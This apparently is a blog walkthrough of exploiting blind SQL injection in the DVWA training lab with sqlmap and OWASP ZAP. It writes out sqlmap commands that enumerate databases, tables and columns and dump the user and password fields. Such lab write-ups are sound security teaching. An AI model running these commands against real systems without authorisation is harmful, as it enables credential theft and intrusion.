Home > DVWA > DVWA: Damn Vulnerable Web Application Blind SQL Injection Walkthrough with SQLMap (Low Security)

DVWA: Damn Vulnerable Web Application Blind SQL Injection Walkthrough with SQLMap (Low Security)

January 29, 2023

 "Disclaimer: The information provided in this article is intended for educational and research purposes only. It is not intended to promote or encourage any illegal or unethical activities. Always act responsibly and obtain proper consent before using any tools or techniques described in this article."


 In this article we’ll hack DVWA’s Blind SQL Injection with the help of SQLMap, one of the most powerful tools of our toolbelt.

As always, you can read all DWVA’s articles here.




To find the cookies value and to monitor sqlmap activity it’s best to use a proxy. To use proxy we are going to use OWASP ZAP (you can also try using Burp Suite). 

Login into your Kali Linux box and DVWA.  Now, open OWASP ZAP and click the firefox button:




Now, Navigate to the DVWA web page, login and set the security to ‘low’ and go to SQL Injection (Blind).




Now enter 1 in the user id field and click submit. It will show something like this:




Now if we enter 10 in the user id field and click submit it will return user id is missing from the database.





I’m not going through with the topic why or how a SQL Injection is blind or not, but you can read about it here. For a simple SQLMap cheatsheet, read this.


Now, we need some parameters that we’ll need for SQLmap and these are displayed in ZAP.




It’s a Get request with parameters in the URL and a cookie. Open a terminal window and type ‘sqlmap --help’:




We’re now ready to start the attack.  We’ll have to create our command with the right parameters:

sqlmap -u "http://10.0.2.6/dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit" --cookie="security=low; PHPSESSID=iola6p2fgtlppfkj09pvuenau1" --dbs


--dbs is used to find databases in the server and after scanning we found 2 database's :



 Now, we have 2 databases and As, we know, information_schema database is commonly found in MYSQL our main focus is on dvwa we will try to extract dvwa

sqlmap -u "http://10.0.2.6/dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit" --cookie="security=low; PHPSESSID=iola6p2fgtlppfkj09pvuenau1" -D dvwa --tables

This will give us the list of tables in the database:



Now, we have 2 tables guestbook and users. we will now fetch the table users and try to extract columns from this table.

sqlmap -u "http://10.0.2.6/dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit" --cookie="security=low; PHPSESSID=iola6p2fgtlppfkj09pvuenau1" -D dvwa -T users --column 




Now, we have extracted columns and now we will extract the column user and password.

sqlmap -u "http://10.0.2.6/dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit" --cookie="security=low; PHPSESSID=iola6p2fgtlppfkj09pvuenau1" -D dvwa -T users -C user,password --dump




If you got stuck or have any questions, leave a comment, and I’ll do my best to get back to you.

Post a Comment

No comments

Thank you for taking the time to leave a comment on my blog. I appreciate your feedback and contribution to the conversation on my blog. Your comment will be automatically approved and visible to other readers. Please note that while I encourage open and respectful dialogue, my team reserves the right to review and remove any comments that violate this blog's terms and conditions, or are considered to be spam or offensive.

Subscribe to: Post Comments ( Atom )
Powered by Blogger.